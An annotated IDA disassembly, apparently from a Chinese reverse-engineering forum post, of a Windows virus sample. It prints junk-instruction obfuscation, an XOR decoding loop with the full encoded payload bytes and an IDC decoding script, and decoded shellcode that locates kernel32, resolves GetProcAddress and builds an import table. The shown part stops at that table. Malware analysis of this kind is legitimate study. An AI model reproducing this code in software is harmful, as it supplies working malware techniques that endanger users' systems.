.text:131510B8 public start
.text:131510B8 start proc near
.text:131510B8 and ebx, 0FFFFFFFFh
.text:131510BB nop
.text:131510BC sub ecx, 0
.text:131510BF loc_131510BF:
.text:131510BF mov esi, esi
.text:131510C1 nop
.text:131510C2 nop
.text:131510C3 nop
.text:131510C4 nop
.text:131510C5 nop
.text:131510C6 sub ebx, 0
.text:131510C9 jmp short $+2
.text:131510CB push esp
.text:131510CC pop esp
.text:131510CD mov edi, edi
.text:131510CF mov esi, esi
.text:131510D1 push ebx
.text:131510D2 pop ebx
.text:131510D3 sub ebx, 0
.text:131510D6 nop
.text:131510D7 and ebx, 0FFFFFFFFh
.text:131510DA nop
.text:131510DB add eax, 0
.text:131510DE or ecx, 0
.text:131510E1 nop
.text:131510E2 push eax
.text:131510E3 pop eax
.text:131510E4 mov edi, edi
.text:131510E6 loc_131510E6:
.text:131510E6 and eax, 0FFFFFFFFh
.text:131510E9 xor ecx, 0
.text:131510EC sub eax, 0
.text:131510EF jmp short loc_13151102
.text:131510EF start endp
.text:131510F1 ; ---------------------------------------------------------------------------
.text:131510F1 xor ebx, eax
.text:131510F3 int 3
.text:131510F4 loc_131510F4:
.text:131510F4 pop ebx
.text:131510F5 mov ecx, 4CDh
.text:131510FA Decode:
.text:131510FA xor byte ptr [ecx+ebx], 89h
.text:131510FE loop Decode ; 解码 @encode_data1
.text:131510FE ;
.text:131510FE ; 解码脚本:
.text:131510FE ; auto i;
.text:131510FE ; auto addr;
.text:131510FE ;
.text:131510FE ; addr = 0x13151108;
.text:131510FE ; for (i=addr; i<addr+0x4cd; i++)
.text:131510FE ; {
.text:131510FE ; Message("%02x decode:%02x\n", Byte(i), Byte(i)^0x89 );
.text:131510FE ; PatchByte(i, Byte(i)^0x89);
.text:131510FE ; }
.text:13151100 jmp short @encode_data1 ; 跳转到解码后的代码
.text:13151102 ; ---------------------------------------------------------------------------
.text:13151102 loc_13151102:
.text:13151102 call loc_131510F4
.text:13151107 cld
.text:13151108 @encode_data1 db 62h, 8Dh,0D9h, 89h, 89h, 89h, 61h, 80h, 89h, 89h, 89h, 61h, 7Ch, 88h, 89h, 89h; 0
.text:13151108 db 4Ah, 7Ah, 2Dh, 4Ah,0DCh, 2, 65h, 0Ah, 4Dh, 75h,0BAh, 7Fh,0EDh, 24h,0C9h,0FDh; 16
.text:13151108 db 8Ch,0C1h, 1Fh, 24h, 62h, 71h, 24h, 1Ah,0C2h,0EFh,0BAh, 52h,0EFh, 8,0B2h,0C4h; 32
.text:13151108 db 0D3h,0FCh, 7Ch, 2, 7Ah, 8Ah,0FAh,0B5h, 8,0B7h,0D9h,0CCh, 89h, 89h,0FCh, 61h; 48
.text:13151108 db 0,0D4h, 75h, 2, 5Ah, 8Ah,0DBh,0B5h, 2,0DBh,0F1h, 8Ah,0DCh, 75h, 2,0D3h; 64
.text:13151108 db 0A9h, 8Ah,0D4h, 75h,0BAh, 49h,0E3h, 87h,0D0h, 2,0B2h, 8Ah,0F4h, 75h, 8,0B6h; 80
.text:13151108 db 0CEh,0ECh,0FDh,0D9h,0FCh, 82h, 8,0F6h, 8Dh,0FBh,0E6h,0EAh,0C8h,0FCh, 8Bh, 62h; 96
.text:13151108 db 80h, 0Ah, 4Ah, 8Dh,0C9h,0B2h,0CBh, 91h,0FCh, 55h, 2,0D3h,0ADh, 8Ah,0D4h, 75h; 112
.text:13151108 db 86h, 3Eh, 85h,0CAh, 2,0D3h, 95h, 8Ah,0D4h, 75h, 2, 8Dh, 2, 8Ah,0CCh, 75h; 128
.text:13151108 db 61h, 89h, 89h, 89h, 89h,0D2h, 8, 62h, 1Ch, 99h,0C9h, 89h, 0, 0Ah,0D4h, 98h; 144
.text:13151108 db 0C9h, 89h, 61h,0F9h, 89h, 89h, 89h,0C5h,0E6h,0E8h,0EDh,0C5h,0E0h,0EBh,0FBh,0E8h; 160
.text:13151108 db 0FBh,0F0h,0C8h, 89h,0CAh,0FBh,0ECh,0E8h,0FDh,0ECh,0CFh,0E0h,0E5h,0ECh,0C8h, 89h; 176
.text:13151108 db 0DEh,0FBh,0E0h,0FDh,0ECh,0CFh,0E0h,0E5h,0ECh, 89h,0CAh,0E5h,0E6h,0FAh,0ECh,0C1h; 192
.text:13151108 db 0E8h,0E7h,0EDh,0E5h,0ECh, 89h,0DFh,0E0h,0FBh,0FDh,0FCh,0E8h,0E5h,0C8h,0E5h,0E5h; 208
.text:13151108 db 0E6h,0EAh, 89h,0E5h,0FAh,0FDh,0FBh,0EAh,0E8h,0FDh,0C8h, 89h,0CEh,0ECh,0FDh,0DEh; 224
.text:13151108 db 0E0h,0E7h,0EDh,0E6h,0FEh,0FAh,0CDh,0E0h,0FBh,0ECh,0EAh,0FDh,0E6h,0FBh,0F0h,0C8h; 240
.text:13151108 db 89h,0CEh,0ECh,0FDh,0DFh,0E6h,0E5h,0FCh,0E4h,0ECh,0C0h,0E7h,0EFh,0E6h,0FBh,0E4h; 256
.text:13151108 db 0E8h,0FDh,0E0h,0E6h,0E7h,0C8h, 89h,0D6h, 61h,0A9h, 89h, 89h, 89h, 89h, 89h, 89h; 272
.text:13151108 db 89h, 89h, 89h, 89h, 89h, 89h, 89h, 89h, 89h, 89h, 89h, 89h, 89h, 89h, 89h, 89h; 288
.text:13151108 db 89h, 89h, 89h, 89h, 89h, 89h, 89h, 89h, 89h, 89h, 89h, 89h, 89h,0D7h, 30h, 81h; 304
.text:13151108 db 89h, 89h, 89h,0D8h,0DEh, 76h,0FCh, 75h, 76h, 1Ah,0D4h, 98h,0C9h, 89h, 0, 8Fh; 320
.text:13151108 db 0Ah, 4Fh, 8Dh, 75h,0BAh, 49h, 7Bh, 27h,0D0h, 6Bh, 61h, 40h, 4Ah, 89h, 89h, 89h; 336
.text:13151108 db 89h, 61h, 89h, 89h, 89h, 89h,0D1h,0A4h,0EFh, 98h,0C9h, 89h, 32h,0EFh, 98h,0C9h; 352
.text:13151108 db 89h, 8Ah, 51h,0C2h,0EFh,0BAh, 52h,0EFh, 8,0B2h,0C4h,0D3h,0FCh, 7Ch, 2, 7Ah; 368
.text:13151108 db 8Ah,0FAh,0B5h, 8,0B7h,0D9h,0CCh, 89h, 89h,0FCh, 61h, 2, 4Ah, 4Ah,0DCh, 2; 384
.text:13151108 db 65h, 0Ah, 4Dh, 71h,0E3h, 89h,0E3h, 89h,0E3h, 89h,0E3h, 89h, 4,0CCh, 75h,0D9h; 400
.text:13151108 db 0E3h, 89h,0E3h, 89h, 61h, 8Dh, 89h, 89h, 89h,0CAh,0B3h,0D5h, 89h, 76h, 1Ah,0B0h; 416
.text:13151108 db 98h,0C9h, 89h, 61h, 8Eh, 89h, 89h, 89h,0FCh,0FAh,0ECh,0FBh,0BAh,0BBh, 89h, 76h; 432
.text:13151108 db 1Ah, 94h, 98h,0C9h, 89h, 61h, 83h, 89h, 89h, 89h,0FEh,0FAh,0F9h,0FBh,0E0h,0E7h; 448
.text:13151108 db 0FDh,0EFh,0C8h, 89h,0D9h, 76h, 1Ah,0D4h, 98h,0C9h, 89h, 0,0CCh, 71h, 2,0CCh; 464
.text:13151108 db 75h,0BAh, 5Bh, 30h, 6Eh, 8Ah, 89h, 89h, 7Eh, 78h,0DBh, 61h, 82h, 89h, 89h, 89h; 480
.text:13151108 db 0EAh,0D6h,0ACh,0B9h,0BAh,0EDh,0A7h,0E7h,0E5h,0FAh, 89h, 76h,0FCh, 81h, 76h,0DCh; 496
.text:13151108 db 71h, 40h, 4Bh, 8Dh, 89h,0DCh, 2, 65h, 8, 4Dh,0F9h, 76h, 76h, 76h, 61h, 89h; 512
.text:13151108 db 89h, 89h, 89h,0D2h, 8, 62h, 9Ah, 9Bh,0C9h, 89h,0E3h, 8Dh,0E1h, 89h, 99h, 89h; 528
.text:13151108 db 89h,0E1h, 89h, 41h, 89h, 89h,0E3h, 89h, 76h, 1Ah,0A4h, 98h,0C9h, 89h, 0Ch, 49h; 544
.text:13151108 db 86h, 0Dh, 53h, 89h, 89h, 89h, 0,0CCh, 7Dh, 61h,0AAh, 76h, 76h, 76h, 0,0CCh; 560
.text:13151108 db 65h, 8Ch, 89h,0D9h, 89h, 89h, 0,0CCh, 75h, 2, 59h, 2,0CBh, 8Dh, 0,0CCh; 576
.text:13151108 db 71h, 2, 8Bh, 8Ah, 59h, 0Ah, 4Bh, 85h, 4,0CCh, 79h,0D9h, 76h,0FCh, 7Dh, 76h; 592
.text:13151108 db 0FCh, 71h,0DBh, 61h, 4, 88h, 89h, 89h, 61h, 89h, 89h, 89h, 89h,0D2h, 8, 62h; 608
.text:13151108 db 0E4h, 9Bh,0C9h, 89h, 4,0DCh, 1,0E3h,0EDh,0DBh, 76h, 1Ah,0BCh, 98h,0C9h, 89h; 624
.text:13151108 db 61h, 8Ah, 89h, 89h, 89h,0D5h,0D5h, 89h, 4,0DCh, 1,0DBh, 76h, 1Ah,0B8h, 98h; 640
.text:13151108 db 0C9h, 89h, 4, 3Ch,0FDh, 76h, 76h, 76h,0E9h,0DFh, 61h, 66h, 77h, 76h, 76h,0E8h; 656
.text:13151108 db 0DFh, 4,0DCh, 1,0DBh, 76h, 1Ah,0B8h, 98h,0C9h, 89h,0E3h, 89h,0E3h, 89h,0E3h; 672
.text:13151108 db 8Bh,0E3h, 89h,0E3h, 89h,0E1h, 89h, 89h, 89h,0C9h, 4,0DCh, 1,0DBh, 76h, 1Ah; 688
.text:13151108 db 0A8h, 98h,0C9h, 89h, 0Ah, 71h, 76h,0FDh,0CEh, 0, 0Ch,0F9h, 76h, 76h, 76h,0E3h; 704
.text:13151108 db 89h, 4,0CCh, 71h,0D9h, 76h,0FCh, 79h, 76h,0FCh, 7Dh, 76h, 3Ch,0F9h, 76h, 76h; 720
.text:13151108 db 76h, 76h, 1Ah,0ACh, 98h,0C9h, 89h, 76h, 3Ch,0F9h, 76h, 76h, 76h, 76h, 1Ah,0A0h; 736
.text:13151108 db 98h,0C9h, 89h, 4,0DCh, 1,0DBh, 76h, 1Ah, 94h, 98h,0C9h, 89h, 0Ch, 49h,0FDh; 752
.text:13151108 db 86h,0E3h, 8Dh,0D9h, 76h, 1Ah,0D4h, 98h,0C9h, 89h, 0Ch, 49h,0FDh, 8Bh, 76h, 59h; 768
.text:13151108 db 0E3h,0C9h,0E1h, 89h, 99h, 89h, 89h,0E1h, 89h, 99h, 89h, 89h,0E3h, 89h, 76h, 1Ah; 784
.text:13151108 db 0A4h, 98h,0C9h, 89h, 0,0CCh, 7Dh, 75h, 37h, 98h, 99h,0C9h, 89h, 8Ah, 7Ah, 30h; 800
.text:13151108 db 8Ah, 89h, 89h, 89h, 2, 71h, 7Ah, 2Dh, 2,0DCh, 75h, 2,0CBh, 81h, 2,0C4h; 816
.text:13151108 db 65h, 8Ah, 48h,0D9h, 2, 83h, 0Ah, 4Bh, 85h, 2, 7Bh, 36h, 89h, 99h,0C9h, 89h; 832
.text:13151108 db 8Ah, 72h, 2, 0Ah, 8Bh, 99h,0C9h, 89h,0A2h, 71h, 75h, 2,0CCh, 7Dh, 76h, 69h; 848
.text:13151108 db 40h, 4Ah,0DCh, 2, 65h, 2,0C4h, 81h,0DFh, 2,0FCh, 99h, 0Ch, 7Fh,0DEh, 2; 864
.text:13151108 db 70h,0FDh, 85h, 2,0DCh, 85h, 3, 8Bh, 1, 88h,0C8h,0CBh,0C7h,0FCh, 7Eh, 2; 880
.text:13151108 db 4Eh,0D6h,0D7h, 40h, 4Bh, 85h, 89h,0DCh, 2, 65h, 2,0C4h, 85h, 2,0DCh, 81h; 896
.text:13151108 db 2, 48h, 48h, 61h, 8Ah, 2, 8Dh, 8Bh, 0Ah, 68h, 8Eh, 5Ah, 61h, 0Ah, 69h, 88h; 912
.text:13151108 db 40h, 4Bh, 81h, 89h,0DCh, 2, 65h, 0Ah, 4Dh, 75h,0DAh,0DFh, 2,0FCh, 99h,0DEh; 928
.text:13151108 db 0BAh, 76h,0BAh, 52h, 62h, 88h,0CAh,0DFh, 76h,0FCh, 85h, 61h, 4Eh, 76h, 76h, 76h; 944
.text:13151108 db 0CFh,0B2h, 4Eh,0FCh, 78h, 0,0F4h, 75h,0DFh, 76h,0FCh, 85h, 61h, 3Fh, 76h, 76h; 960
.text:13151108 db 76h, 2, 46h, 5Ah, 69h, 80h,0CCh, 75h,0CEh,0CFh, 0Ah, 76h, 8Ah,0FBh, 60h, 2; 976
.text:13151108 db 0C4h, 81h, 4,0CAh, 8Dh, 0, 88h, 2,0CCh, 75h,0D6h,0D7h, 4,0CDh, 51h, 88h; 992
.text:13151108 db 0D2h, 40h, 4Bh, 85h, 89h,0DCh, 2, 65h, 0Ah, 4Dh, 65h,0DFh,0BAh, 7Fh,0B0h,0FCh; 1008
.text:13151108 db 85h,0DEh, 2,0F4h, 99h, 4Eh,0CCh, 79h, 89h, 75h, 76h, 76h, 0,0F4h, 65h, 0; 1024
.text:13151108 db 0FCh, 7Dh, 86h, 0Fh, 2Eh, 89h, 89h, 89h,0DAh, 62h, 8Ah, 2,0F4h, 99h,0DFh, 76h; 1040
.text:13151108 db 0FCh, 81h, 61h,0E9h, 76h, 76h, 76h,0BAh, 52h,0CFh,0B2h, 4Ah,0FDh,0D6h, 2,0CCh; 1056
.text:13151108 db 79h,0B2h, 4Ah,0F5h, 8Eh, 8Ah, 4Eh, 0,0CCh, 71h, 62h, 84h,0B4h, 89h, 75h, 76h; 1072
.text:13151108 db 76h, 0,0F4h, 71h,0F4h, 8Ah, 0,0D4h, 71h,0BAh, 76h,0DFh, 76h,0FCh, 81h, 61h; 1088
.text:13151108 db 0BAh, 76h, 76h, 76h, 2, 46h, 5Ah, 69h, 82h, 51h,0CEh,0CFh, 0Ah, 76h, 83h,0F5h; 1104
.text:13151108 db 63h,0DFh, 76h,0FCh, 81h, 4,0CCh, 75h,0D9h, 61h,0BFh, 76h, 76h, 76h, 8Ah,0FCh; 1120
.text:13151108 db 75h, 2, 71h, 2,0CCh, 71h,0DEh, 8Ah, 51h,0DAh, 76h,0FCh, 65h, 61h, 69h, 77h; 1136
.text:13151108 db 76h, 76h, 88h,0F4h, 65h, 88h,0F4h, 79h, 88h,0F4h, 7Dh, 62h,0A1h,0BAh, 76h,0BBh; 1152
.text:13151108 db 52h,0DFh, 76h,0FCh, 81h, 61h, 64h, 77h, 76h, 76h, 2, 46h, 5Bh, 69h, 83h, 51h; 1168
.text:13151108 db 0CEh,0CFh, 0Ah, 76h, 81h,0F5h, 63h, 2,0CCh, 65h, 76h,0CCh, 65h, 76h,0CCh, 79h; 1184
.text:13151108 db 76h,0CCh, 7Dh, 1, 91h,0B2h,0FCh, 85h, 86h, 0Bh,0D4h, 76h, 76h, 76h,0D2h, 2; 1200
.text:13151108 db 0CCh, 9Dh, 2,0C4h, 7Dh,0D6h, 0, 81h,0D7h, 40h, 4Bh, 99h, 89h; 1216
auto i;
auto addr;
addr = 0x13151108;
for (i=addr; i<addr+0x4cd; i++)
Message("%02x decode:%02x\n", Byte(i), Byte(i)^0x89 );
PatchByte(i, Byte(i)^0x89);
.text:13151108 @encode_data1: ; 解码后的代码
.text:13151108 jmp short loc_1315110E
.text:13151108 ; ---------------------------------------------------------------------------
.text:1315110A db 50h ; P
.text:1315110B db 0
.text:1315110C db 0
.text:1315110D db 0
.text:1315110E ; ---------------------------------------------------------------------------
.text:1315110E loc_1315110E:
.text:1315110E call @IAT ; 这里处理导入函数
.text:13151113 call @Malice
.text:13151118 retn
.text:13151119 ; ---------------------------------------------------------------------------
.text:13151119 rep movsb
.text:1315111B retn
.text:1315111C ; ---------------------------------------------------------------------------
.text:1315111C loc_1315111C:
.text:1315111C push ebp
.text:1315111D mov ebp, esp
.text:1315111F add esp, -4
.text:13151122 xor esi, esi
.text:13151124 lods dword ptr fs:[esi]
.text:13151126 @find_seh_tail:
.text:13151126 inc eax
.text:13151127 loc_13151127:
.text:13151127 jz short loc_1315112E
.text:13151129 dec eax
.text:1315112A xchg eax, esi
.text:1315112B lodsd
.text:1315112C jmp short @find_seh_tail
.text:1315112E ; ---------------------------------------------------------------------------
.text:1315112E loc_1315112E:
.text:1315112E lodsd
.text:1315112F xchg eax, ebx
.text:13151130 @find_krl32_base:
.text:13151130 dec ebx
.text:13151131 xor bx, bx
.text:13151134 cmp word ptr [ebx], 5A4Dh ; IMAGE_DOS_SIGNATURE
.text:13151139 jnz short @find_krl32_base
.text:1315113B mov esi, ebx
.text:1315113D add esi, [ebx+IMAGE_DOS_HEADER.e_lfanew]
.text:13151140 cmp dword ptr [esi], 4550h ; IMAGE_NT_SIGNATURE
.text:13151146 jnz short @find_krl32_base
.text:13151148 mov [ebp-4], ebx
.text:1315114B mov edx, ebx
.text:1315114D add edx, [edx+IMAGE_DOS_HEADER.e_lfanew]
.text:13151150 mov edx, [edx+IMAGE_NT_HEADERS.OptionalHeader.DataDirectory.VirtualAddress]
.text:13151153 add edx, [ebp-4] ; kernel32.dll 导出表地址
.text:13151156 mov ebx, [edx+IMAGE_EXPORT_DIRECTORY.AddressOfNames]
.text:13151159 add ebx, [ebp-4]
.text:1315115C xor eax, eax
.text:1315115E @find_exp_GetProcAddress:
.text:1315115E push 0Eh
.text:13151160 pop ecx
.text:13151161 mov edi, [ebx]
.text:13151163 add edi, [ebp-4]
.text:13151166 cmp dword ptr [edi], 50746547h ; 'GetP'在内存中是 47 65 74 50,用DWORD表示就是0x50746547
.text:1315116C jnz short loc_13151179
.text:1315116E cmp dword ptr [edi+4], 41636F72h ; 'rocA'这里和前面的连起来就是 'GetProcA',呵呵在找 'GetProcAddress'
.text:13151175 jnz short loc_13151179
.text:13151177 jmp short loc_13151182
.text:13151179 ; ---------------------------------------------------------------------------
.text:13151179 loc_13151179:
.text:13151179 add ebx, 4
.text:1315117C inc eax
.text:1315117D cmp eax, [edx+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
.text:13151180 loc_13151180:
.text:13151180 jnz short @find_exp_GetProcAddress
.text:13151182 loc_13151182:
.text:13151182 mov ebx, [edx+IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals]
.text:13151185 add ebx, [ebp-4]
.text:13151188 movzx ecx, word ptr [ebx+eax*2]
.text:1315118C mov ebx, [edx+IMAGE_EXPORT_DIRECTORY.AddressOfFunctions]
.text:1315118F loc_1315118F:
.text:1315118F add ebx, [ebp-4]
.text:13151192 mov eax, [ebx+ecx*4]
.text:13151195 add eax, [ebp-4] ; GetProcAddress 地址
.text:13151198 loc_13151198:
.text:13151198 call $+5
.text:1315119D pop ebx
.text:1315119E sub ebx, 401095h
.text:131511A4 loc_131511A4:
.text:131511A4 mov [ebx+40115Dh], eax ; 存储GetProcAddress地址到 text:13151265 imp_GetProcAddress
.text:131511AA loc_131511AA:
.text:131511AA call make_IAT ; 构建病毒要使用的导入函数表
.text:131511AA ; ---------------------------------------------------------------------------
.text:131511AF s_Loadlibrarya_0 db 'LoadLibraryA',0
.text:131511BC s_Createfilea db 'CreateFileA',0
.text:131511C8 s_Writefile db 'WriteFile',0
.text:131511D2 s_Closehandle_0 db 'CloseHandle',0
.text:131511DE s_Virtualalloc db 'VirtualAlloc',0
.text:131511EB s_Lstrcata db 'lstrcatA',0
.text:131511F4 s_Getwindowsdire db 'GetWindowsDirectoryA',0
.text:13151209 s_Getvolumeinfor db 'GetVolumeInformationA',0
.text:1315121F ; ---------------------------------------------------------------------------
.text:1315121F make_IAT:
.text:1315121F pop edi ; edi指向上面的字符串列表
.text:13151220 call @m_IAT
.text:13151220 ; ---------------------------------------------------------------------------
.text:13151225 imp_LoadLibraryA dd 0
.text:13151229 imp_CreateFileA dd 0
.text:1315122D imp_WriteFile dd 0
.text:13151231 imp_CloseHandle dd 0
.text:13151235 imp_VirtualAlloc dd 0
.text:13151239 imp_lstrcatA dd 0
.text:1315123D imp_GetWindowsDirectoryA dd 0
.text:13151241 imp_GetVolumeInformationA dd 0
.text:13151245 ; =============== S U B R O U T I N E =======================================
.text:13151245 @m_IAT proc near ; 用GetProcAddress获得其他用到的函数地址
.text:13151245 pop esi
.text:13151246 loc_13151246:
.text:13151246 mov ecx, 8
.text:1315124B loc_1315124B:
.text:1315124B push ecx
.text:1315124C push edi
.text:1315124D push dword ptr [ebp-4] ; kernel32 base address
.text:13151250 call dword ptr [ebx+40115Dh] ; imp_GetProcAddress
.text:13151256 mov [esi], eax
.text:13151258 add esi, 4
.text:1315125B cld
.text:1315125C xor eax, eax
.text:1315125E repne scasb
.text:13151260 pop ecx
.text:13151261 loop loc_1315124B ; 循环
.text:13151263 leave
.text:13151264 retn
.text:13151264 @m_IAT endp ; sp = 4
.text:13151264 ; ---------------------------------------------------------------------------
.text:13151265 imp_GetProcAddress dd 0
[招生]科锐逆向工程师培训(2025年3月11日实地,远程教学同时开班, 第52期)!